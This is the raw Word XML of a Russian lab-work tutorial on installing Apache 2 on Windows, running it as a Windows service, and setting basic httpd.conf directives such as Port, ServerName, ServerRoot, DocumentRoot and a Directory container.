        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запустите установщик Web-сервера Apache. Результатом будет окно с лицензионным соглашением, после принятия которого, следует перейти к следующему окну с краткой информацией о нововведениях во второй версии Apache. Следующее окно, показанное на рисунке, позволяет ввести информацию о сервере: доменное имя сервера, имя сервера и адрес электронной почты администратора. Если установка происходит на локальную машину, то в поля для доменного имени и имени сервера следует ввести localhost (см. рисунок.). В нижней части окна предлагается выбрать номер порта по которому сервер будет принимать запросы (80 или 8080).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2176950" cy="1639056"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="198" name="Рисунок 30056" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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6" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image278.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId442" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2176950" cy="1639056"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>localhost - это имя для использования сервера на локальной машине, которое связано с IP-адресом 127.0.0.1, который зарезервирован для локального использования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После этого будет предложен способ установки: стандартный (Typical) или выборочный (Custom), позволяющий выбрать компоненты сервера вручную. Следующее окно позволяет выбрать каталог установки сервера, по умолчанию это C:Program FilesApache Group, но мы рекомендуем выбрать другой каталог, например, С:www. После этого мастер установки сообщит о готовности к процессу установки и после нажатия кнопки Install, будет произведено копирование файлов сервера. Если установка прошла успешно, Windows автоматически запустит Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После успешной инсталляции при наборе в окне браузера http://localhost/ или http://127.0.0.1/ - должна загрузится страница сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь необходимо научиться управлять Apache, а именно научится запускать, останавливать и перезапускать сервер. Существует много способов осуществить эти операции: при помощи утилиты ApacheMonitor, используя консоль управления сервисов </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Windows, используя пункты меню Пуск, из командной строки… Мы рассмотрим консоль управления сервисов Windows, позволяющего настроить Apache для автоматического старта при запуске системы. Для запуска консоли управления выполните команду </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Пуск-&gt;Настройка-&gt;Панель управления-&gt;Администрирование-&gt;Службы. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В появившемся окне консоли, на привед</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нном ниже рисунке, следует выбрать сервис Apache2. Контекстное меню, открывающееся по нажатию на правой кнопке, позволяет осуществлять запуск, остановку и перезапуск сервиса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1809750" cy="1165919"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="199" name="Рисунок 30057" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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7" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image279.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId443" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1810227" cy="1166226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Службы Windows позволяют осуществлять запуск фоновых приложений при старте системы. Для этого необходимо перейти в окно Свойства, выбрав в контекстном меню сервиса пункт Свойства и в появившемся окне в выпадающем списке «Тип запуска» выбрать пункт «Авто».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ServerRoot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ServerName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ServerAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Директивы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пути к файлам</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфигурирование Apache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web-сервер — сложный программный продукт работающий на разных платформах и в разных операционных системах по всему миру. Поэтому для корректной работы на установленной системе его необходимо настроить (сконфигурировать).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>По умолчанию настройки Apache расположены в файле httpd.conf в директории conf. Далее будут описаны основные директивы файла httpd.conf и их общеупотребительные значения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В конфигурационных файлах Apache и PHP Вам часто придется указывать пути к различным директориям и папкам. В операционных системах UNIX и Windows при-меняются различные разделители каталогов. В UNIX используется прямая косая черта «/», например /usr/bin/perl, в в Windows обратная, например, c:Apachein. Вообще, в некоторых директивах Apache и PHP работают оба вида разделителей каталогов: прямой(/) и обратный(), но так как и Apache и PHP изначально разрабаты-вались под UNIX, то применяя их «родной» формат, Вы сможете избежать ряда проблем. Поэтому пути в настроечных файлах (httpd.conf и php.ini) рекомендуется писать через слеш в формате UNIX — «/». Например:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ScriptAlias «/php_dir/» «c:/php/»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Устанавливает порт TCP, который используется Apache для установки соединения. По умолчанию используется 80 порт.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Единственная причина использования нестандартного порта — это отсутствие прав на использование стандартного порта. При использовании нестандартного порта, например, 8080 номер порта следует указывать в адресе, например: http://localhost:8080/.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ServerAdmin mymail@yandex.ru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержит e-mail-адрес администратора web-сервера, который будет отображаться при ошибках работы сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ServerName myserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Содержит имя компьютера для сервера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ServerRoot «C:/Apache2»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Указывает на каталог, содержащий файлы WEB-сервера Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Не путайте директиву ServerRoot с директивой DocumentRoot, которая указывает каталог для файлов WEB-сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DocumentRoot «C:/Apache2/htdocs»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Определяет каталог, в котором расположены файлы WEB-сайта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Контейнер &lt;Directory /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сфера действия директив внутри этого контейнера распространяется на все файлы и подкаталоги внутри DocumentRoot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;Directory /&gt;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Options FollowSymLinks Includes Indexes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AllowOverride All </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/Directory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· Директива AllowOverride установленная в значение All разрешает переопределять значения главного конфигурационного файла httpd.conf в файлах .htaccess.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00607C3B" w:rsidRPr="00617AC0" w:rsidRDefault="00607C3B" w:rsidP="005B25E6">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>· Директива Options FollowSymLinks разрешает Apache следовать символическим ссылкам.</w:t>
      </w:r>
    </w:p>
